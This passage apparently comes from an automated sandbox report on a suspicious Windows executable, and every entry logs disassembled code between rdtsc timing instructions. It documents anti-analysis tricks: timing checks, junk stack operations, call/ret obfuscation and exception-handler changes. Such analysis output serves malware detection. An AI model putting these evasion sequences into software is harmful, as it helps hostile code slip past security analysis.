            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A405C7 second address: A405F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b jmp 00007FAD40FC0C62h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FAD40FC0C62h 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A405F8 second address: A4062E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FD676Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e ja 00007FAD40FD677Eh 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4062E second address: A40633 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A40633 second address: A4066A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push esi 0x0000000c jmp 00007FAD40FD676Eh 0x00000011 pop esi 0x00000012 pop eax 0x00000013 jng 00007FAD40FD676Ch 0x00000019 mov dword ptr [ebp+122D1E32h], ebx 0x0000001f call 00007FAD40FD6769h 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4066A second address: A40670 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A40670 second address: A406E7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FAD40FD6774h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FAD40FD6774h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jmp 00007FAD40FD6776h 0x0000001a mov eax, dword ptr [eax] 0x0000001c jp 00007FAD40FD677Eh 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 jl 00007FAD40FD677Bh 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A40EAE second address: A40EC2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop edx 0x0000000c jnp 00007FAD40FC0C5Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A417E5 second address: A417EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A417EB second address: A417F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A419CF second address: A419E1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 jp 00007FAD40FD6774h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A419E1 second address: A419E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A419E5 second address: A419FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 jc 00007FAD40FD676Ch 0x0000000d mov edi, dword ptr [ebp+1244873Fh] 0x00000013 xchg eax, ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A419FF second address: A41A03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A41A03 second address: A41A09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A41A09 second address: A41A36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FAD40FC0C56h 0x00000009 jmp 00007FAD40FC0C66h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 je 00007FAD40FC0C56h 0x0000001b pop ebx 0x0000001c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A41F1F second address: A41F84 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FAD40FD6768h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 push 00000000h 0x00000026 mov dword ptr [ebp+122D3949h], edi 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push edi 0x00000031 call 00007FAD40FD6768h 0x00000036 pop edi 0x00000037 mov dword ptr [esp+04h], edi 0x0000003b add dword ptr [esp+04h], 0000001Bh 0x00000043 inc edi 0x00000044 push edi 0x00000045 ret 0x00000046 pop edi 0x00000047 ret 0x00000048 xchg eax, ebx 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d jno 00007FAD40FD6766h 0x00000053 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A41F84 second address: A41F9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FC0C63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A42935 second address: A42939 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A03679 second address: A03683 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FAD40FC0C56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A46FD7 second address: A47062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jnp 00007FAD40FD6766h 0x0000000b jmp 00007FAD40FD6779h 0x00000010 popad 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 pushad 0x00000016 mov eax, dword ptr [ebp+122D358Dh] 0x0000001c mov dword ptr [ebp+1246A468h], eax 0x00000022 popad 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push edi 0x00000028 call 00007FAD40FD6768h 0x0000002d pop edi 0x0000002e mov dword ptr [esp+04h], edi 0x00000032 add dword ptr [esp+04h], 0000001Ch 0x0000003a inc edi 0x0000003b push edi 0x0000003c ret 0x0000003d pop edi 0x0000003e ret 0x0000003f mov dword ptr [ebp+122D278Eh], eax 0x00000045 push 00000000h 0x00000047 push 00000000h 0x00000049 push edi 0x0000004a call 00007FAD40FD6768h 0x0000004f pop edi 0x00000050 mov dword ptr [esp+04h], edi 0x00000054 add dword ptr [esp+04h], 00000017h 0x0000005c inc edi 0x0000005d push edi 0x0000005e ret 0x0000005f pop edi 0x00000060 ret 0x00000061 xchg eax, ebx 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 pop eax 0x00000068 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A47062 second address: A4706C instructions: 0x00000000 rdtsc 0x00000002 jns 00007FAD40FC0C56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4706C second address: A470A1 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FAD40FD677Dh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FAD40FD6771h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A470A1 second address: A470A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A486DA second address: A486E4 instructions: 0x00000000 rdtsc 0x00000002 je 00007FAD40FD676Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A47986 second address: A4798C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49225 second address: A49229 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49229 second address: A49238 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FC0C5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49238 second address: A4923F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A492BE second address: A492C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A492C2 second address: A492C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49E98 second address: A49E9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49E9D second address: A49EBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FAD40FD6766h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FAD40FD676Dh 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49EBD second address: A49ED2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FC0C61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49ED2 second address: A49EDC instructions: 0x00000000 rdtsc 0x00000002 jns 00007FAD40FD676Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4A693 second address: A4A69D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FAD40FC0C56h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4CF93 second address: A4CFD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 nop 0x00000009 add di, 10D2h 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007FAD40FD6768h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a push 00000000h 0x0000002c xchg eax, esi 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FAD40FD6771h 0x00000034 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4CFD6 second address: A4CFF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FC0C60h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4CFF2 second address: A4CFF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4D10B second address: A4D11F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jne 00007FAD40FC0C56h 0x00000011 push esi 0x00000012 pop esi 0x00000013 popad 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4E1A3 second address: A4E1AD instructions: 0x00000000 rdtsc 0x00000002 js 00007FAD40FD676Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4D11F second address: A4D125 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4F17F second address: A4F196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FAD40FD6766h 0x0000000a popad 0x0000000b pop eax 0x0000000c push eax 0x0000000d jo 00007FAD40FD6770h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4D125 second address: A4D129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4E1AD second address: A4E1C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAD40FD676Dh 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A501AF second address: A501B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4E1C5 second address: A4E1CF instructions: 0x00000000 rdtsc 0x00000002 jno 00007FAD40FD6766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4F293 second address: A4F2A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007FAD40FC0C56h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4F2A5 second address: A4F2AF instructions: 0x00000000 rdtsc 0x00000002 jng 00007FAD40FD6766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A513B8 second address: A513C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD40FC0C5Ch 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4F2AF second address: A4F2B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A523DD second address: A523E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A51529 second address: A51533 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FAD40FD6766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A51533 second address: A5153D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FAD40FC0C56h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5153D second address: A515E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FD6778h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007FAD40FD6768h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000018h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 mov di, 8921h 0x0000002c push edx 0x0000002d mov ebx, dword ptr [ebp+122D3CCEh] 0x00000033 pop edi 0x00000034 push dword ptr fs:[00000000h] 0x0000003b push 00000000h 0x0000003d push edi 0x0000003e call 00007FAD40FD6768h 0x00000043 pop edi 0x00000044 mov dword ptr [esp+04h], edi 0x00000048 add dword ptr [esp+04h], 00000014h 0x00000050 inc edi 0x00000051 push edi 0x00000052 ret 0x00000053 pop edi 0x00000054 ret 0x00000055 mov bl, E4h 0x00000057 mov dword ptr fs:[00000000h], esp 0x0000005e mov ebx, dword ptr [ebp+122D31BBh] 0x00000064 mov eax, dword ptr [ebp+122D1439h] 0x0000006a js 00007FAD40FD676Ah 0x00000070 mov di, AA62h 0x00000074 push FFFFFFFFh 0x00000076 mov dword ptr [ebp+122D2933h], edi 0x0000007c push eax 0x0000007d push eax 0x0000007e push edx 0x0000007f jmp 00007FAD40FD6770h 0x00000084 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A525A8 second address: A525AD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A525AD second address: A525C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FAD40FD6771h 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A525C8 second address: A5265F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FC0C67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov ebx, dword ptr [ebp+1247119Eh] 0x00000010 push dword ptr fs:[00000000h] 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007FAD40FC0C58h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 00000017h 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 mov bh, 3Ah 0x00000033 xor bl, FFFFFFF1h 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d mov eax, dword ptr [ebp+122D01F5h] 0x00000043 push 00000000h 0x00000045 push ecx 0x00000046 call 00007FAD40FC0C58h 0x0000004b pop ecx 0x0000004c mov dword ptr [esp+04h], ecx 0x00000050 add dword ptr [esp+04h], 00000017h 0x00000058 inc ecx 0x00000059 push ecx 0x0000005a ret 0x0000005b pop ecx 0x0000005c ret 0x0000005d push FFFFFFFFh 0x0000005f mov bx, si 0x00000062 nop 0x00000063 jmp 00007FAD40FC0C62h 0x00000068 push eax 0x00000069 push eax 0x0000006a push edx 0x0000006b pushad 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5265F second address: A52666 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A53783 second address: A53789 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A55671 second address: A556A4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FAD40FD6772h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 jmp 00007FAD40FD6775h 0x00000015 pop ecx 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A556A4 second address: A55702 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FAD40FC0C56h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f sub edi, 6111E4F5h 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007FAD40FC0C58h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 0000001Dh 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 movsx edi, ax 0x00000034 mov edi, dword ptr [ebp+122D1CC6h] 0x0000003a push 00000000h 0x0000003c mov edi, eax 0x0000003e xchg eax, esi 0x0000003f push esi 0x00000040 jnc 00007FAD40FC0C58h 0x00000046 pop esi 0x00000047 push eax 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b ja 00007FAD40FC0C56h 0x00000051 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5673F second address: A56743 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A56743 second address: A5679E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FAD40FC0C69h 0x0000000e pushad 0x0000000f jmp 00007FAD40FC0C5Ch 0x00000014 jng 00007FAD40FC0C56h 0x0000001a popad 0x0000001b popad 0x0000001c nop 0x0000001d sbb bl, 0000006Bh 0x00000020 push 00000000h 0x00000022 jmp 00007FAD40FC0C5Fh 0x00000027 push 00000000h 0x00000029 sub dword ptr [ebp+122D1E60h], eax 0x0000002f push eax 0x00000030 pushad 0x00000031 pushad 0x00000032 push edi 0x00000033 pop edi 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5885D second address: A5886A instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAD40FD6766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A56959 second address: A56972 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FAD40FC0C5Ch 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5A81F second address: A5A824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5A824 second address: A5A843 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FC0C64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5A843 second address: A5A847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5A847 second address: A5A84B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5A84B second address: A5A851 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C7FB second address: A5C7FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C7FF second address: A5C812 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FAD40FD676Bh 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C812 second address: A5C81E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5CA22 second address: A5CA34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FD676Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A606F6 second address: A606FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64087 second address: A64097 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FD676Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64097 second address: A6409C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6409C second address: A640CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007FAD40FD676Ah 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jng 00007FAD40FD6768h 0x00000018 pushad 0x00000019 jmp 00007FAD40FD676Eh 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 popad 0x00000021 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A640CD second address: A640D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
